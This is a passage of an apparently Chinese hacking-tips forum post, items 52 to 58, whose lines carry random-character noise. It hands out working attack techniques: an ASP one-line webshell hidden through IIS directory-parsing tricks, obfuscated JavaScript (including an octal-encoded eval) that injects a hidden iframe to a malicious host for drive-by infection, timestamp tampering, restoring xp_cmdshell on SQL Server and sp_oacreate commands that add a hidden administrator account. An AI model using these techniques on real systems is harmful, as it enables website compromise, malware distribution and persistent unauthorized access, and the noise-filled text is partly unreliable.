1 E9 `/ ^5 r1 J" U+ U( e9 v V52、at "12:17" /interactive cmd
$ Z2 v1 |2 w' r7 _+ A执行后可以用AT命令查看新加的任务
- D1 m( b4 D# A4 o用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
[( x. ]7 s7 n; V2 m
2 a. i' W3 Z v# O& ]; j# O3 y53、隐藏ASP后门的两种方法# V( M$ {" E- L3 k
1、建立非标准目录:mkdir images..\9 Q/ E; y# J, o
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp* E' Z; H5 I: y/ q7 h1 d
通过web访问ASP木马:http://ip/images../news.asp?action=login1 r8 G; U8 P" e9 o' K, }4 T ?) ^
如何删除非标准目录:rmdir images..\ /s% K1 R5 Z, s6 c! y5 F
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
: {9 ~& X, ? Umkdir programme.asp% f; a9 X) T7 l2 G+ Z8 J+ Q" k
新建1.txt文件内容:<!--#include file=”12.jpg”-->
, M& h$ {1 X0 L新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
/ E, k2 o, m" \; D: Y8 [8 jattrib +H +S programme.asp1 Y: H* `8 y: f$ z( a
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
+ b& m3 b! S' _- O* P0 O) N: W# V
9 c2 z6 q! E0 E* M% n6 g) {54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。/ ^2 `2 s/ x, r
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
& G; u' R! U$ F* l" m7 E
8 V. n1 E: C( p. U* Z. k$ p55、JS隐蔽挂马
! U8 @1 R. w+ M$ K7 ^, l0 S7 ]" q0 u1.( c) c0 x& y" v3 h- ?. P8 ~
var tr4c3="<iframe src=ht";
- x8 k8 y+ B8 ~- C' e$ Z: Ctr4c3 = tr4c3+"tp:/";
4 d6 A5 e9 F- {: y Ctr4c3 = tr4c3+"/ww";
' M, k: ^- ~& Ytr4c3 = tr4c3+"w.tr4";
8 g2 |. C8 D1 w" b0 Etr4c3 = tr4c3+"c3.com/inc/m";
6 t+ Z6 b' D8 K$ d! Ztr4c3 = tr4c3+"m.htm style="display:none"></i";
! r' E8 F# {8 I: n; xtr4c3 =tr4c3+"frame>'";
# ]+ m! m: g* |+ M# A8 Jdocument.write(tr4c3);3 ^1 F- n- ?! T/ `" X) H0 z4 `
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
' e1 r$ T9 K4 Y% P4 a
) k% y- O1 ~6 b G/ l4 c# G2., t; S+ n; c" k9 ~
转换进制,然后用EVAL执行。如6 B4 b0 J" H; L7 y1 N
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
" g; e% W" Z' d1 U0 e; x* j不过这个有点显眼。
! I! \6 r- n! r3.+ s8 V. m6 D/ v% [
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');) ?) Y' K! m. _) o9 h- Z! r
最后一点,别忘了把文件的时间也修改下。! c' t2 W, Z3 d) V; ~
- F9 U- C. R* H, a56.3389终端入侵常用DOS命令. Z, J5 S* \( C
taskkill taskkill /PID 1248 /t+ b& _( B) ^( ]% ~
5 y6 p, x5 S" p" k
tasklist 查进程
4 H3 S0 |4 q3 _" C6 R& z" V, y5 \# g) z U4 I9 J# L$ L
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
, H) q @! }, M) p1 h" r/ K) d+ Wiisreset /reboot
/ w2 [! H4 U0 [$ h5 ztsshutdn /reboot /delay:1 重起服务器
) X0 [% E) C0 |6 W% x2 k# ~: f/ N X* L; y
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,5 G, p A7 {2 Z! E& @% i/ c* t
) F( Z8 y* \. G) v
query user 查看当前终端用户在线情况
% n, a! r3 L& j4 {
! d3 f1 ^- W, u4 F) a* U2 ]要显示有关所有会话使用的进程的信息,请键入:query process *
. n) g' C! U- o# B; P! L7 s
7 b5 ]/ ?" i) n! d要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
, X* s- ~+ S( R4 }" \0 [/ `+ Z/ u& s0 e" w0 b: B
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
, \1 U, o, d% v4 A. ~1 g
1 d5 ~6 W7 B" U: {6 ]: S8 `4 q要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02: H7 }) P+ o5 P8 @7 m6 j
# P0 @' g9 m7 N3 {9 P' Q' W
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
) C2 G, ?* Z% m& o m+ N% s
. }+ T9 H8 L0 i/ O# e/ [) j" ?命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统- c9 a+ U* v7 }
, Y2 W- ^7 w6 ]命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
: l; I l" u+ P/ {; C
# \& C. f; ]7 t+ J. ?# |命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机1 y e W" A8 X% l: L
2 J3 |6 s+ L7 X2 [" ^) S
56、在地址栏或按Ctrl+O,输入:+ C* d3 G$ j+ P) H4 k8 p; G7 m( ]
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;7 t7 X7 H% y6 \$ ^4 u3 c+ d
1 i: t# Z1 h2 U* L2 F) }. C源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。8 |9 Y4 o% _# S. n' I' `
( g7 ?9 }( x A% }4 n. v1 b- [
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
: ^4 |" S: O2 Y% W0 _8 s0 @6 m# L; _用net localgroup administrators是可以看到管理组下,加了$的用户的。4 d2 R* k3 a) N9 z" c2 [) v
5 | f) @/ ~2 [0 L58、 sa弱口令相关命令
" D: p8 o. K8 S6 p8 I. K9 q0 j9 }8 }, p s# M* c4 @5 J
一.更改sa口令方法:
4 n# r: }. |5 Z用sql综合利用工具连接后,执行命令:
, X( O, ^5 L/ Rexec sp_password NULL,'20001001','sa'
; h4 Y/ H: O3 y(提示:慎用!), [' D v: z1 Y4 u9 v2 D' a
4 a2 g: V0 F2 G e. g: \% S/ u. H
二.简单修补sa弱口令.; V: N3 d5 Z, V- N; z
. E$ [. B, G0 r方法1:查询分离器连接后执行:. e c! s; u- \3 j
if exists (select * from
' U) {; |" X1 V" zdbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
* E/ q* z, o& gOBJECTPROPERTY(id, N'IsExtendedProc') = 1)
# B. o5 h0 X1 `/ j+ r7 w7 A2 K0 {; U" |* ^* {
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'6 ~7 V4 Y/ T {% B! U# S
( T* V' Z- E9 s8 @$ W7 c! V
GO
8 _1 B$ q2 [% ]% _. f' A' C% x) U; ?4 C8 S
然后按F5键命令执行完毕
. k) ^; k, ^) @2 D, R
+ F( g( X4 @9 v$ X方法2:查询分离器连接后
, q6 E( a1 | s9 w2 X* G第一步执行:use master
) V9 m: b8 Y7 z3 n7 z第二步执行:sp_dropextendedproc 'xp_cmdshell'
6 u. K4 O9 i# m然后按F5键命令执行完毕
( m. H2 Y9 @6 q7 f, c9 r* P% O( Q- l& P% b
8 K4 j7 Z+ ^+ d
三.常见情况恢复执行xp_cmdshell.
5 R# q- r+ n) Q- U- J3 D/ p$ f7 K! z* o3 ^
7 \3 j( H* P0 P
1 未能找到存储过程'master..xpcmdshell'.
9 V7 @' U6 A; z. b% j# b 恢复方法:查询分离器连接后,; J6 [8 M8 ^: [! |% A
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int x: X- P% b' Z f7 y
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
4 x8 q5 i' P( {5 Y" h然后按F5键命令执行完毕
; O' ?: k+ P; [ e! t% g
' e* c" _0 J* m+ o! ? K& W# j; q2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)1 K$ _# ^4 o9 U
恢复方法:查询分离器连接后,
5 s$ G* a$ [8 ~. T( S$ u第一步执行:sp_dropextendedproc "xp_cmdshell"
% u4 g; J$ X F/ }第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'. U# T: g: d6 {/ s" w6 ]' X L
然后按F5键命令执行完毕) k- p% D3 a" ]9 {
* l9 J' ^" z- i7 `
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
5 Q O& X) F8 W4 h6 A- X6 f恢复方法:查询分离器连接后,9 ^* N c/ l8 y% n) T! \
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
: R. W4 T7 u+ \. `! s% ]* N5 k第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
. X, M( o7 X+ z然后按F5键命令执行完毕& f4 G6 {0 x+ l; V
$ E1 H# R6 b$ J. B四.终极方法.
7 d2 g/ ~% O8 Z+ i+ H' W如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
0 Q, p5 j8 f, r# P2 _4 t9 b查询分离器连接后,$ F- o/ ?5 w2 H. X' m7 _) W0 G4 }
2000servser系统:: z" w0 R; u' E) }0 b; a
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
; L& S! U6 [+ ^0 [5 H
! X/ _4 I3 a7 g3 ~4 {) edeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'* j/ ?2 j$ l, k/ ^" G" L7 k
5 | @, w/ s, ]) Oxp或2003server系统:* Q: u( P( ^8 }* L
2 b; u0 u( a4 l4 o& Z( D& ?/ k
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
$ ?6 z! ~: U$ O6 X( j' g! y& Q6 C
' h' y3 {& y! j5 C4 e) i" Ydeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
( w5 S0 s" O& Y) s7 X |
发表于 2012-9-15 14:13:15
收藏
支持
反对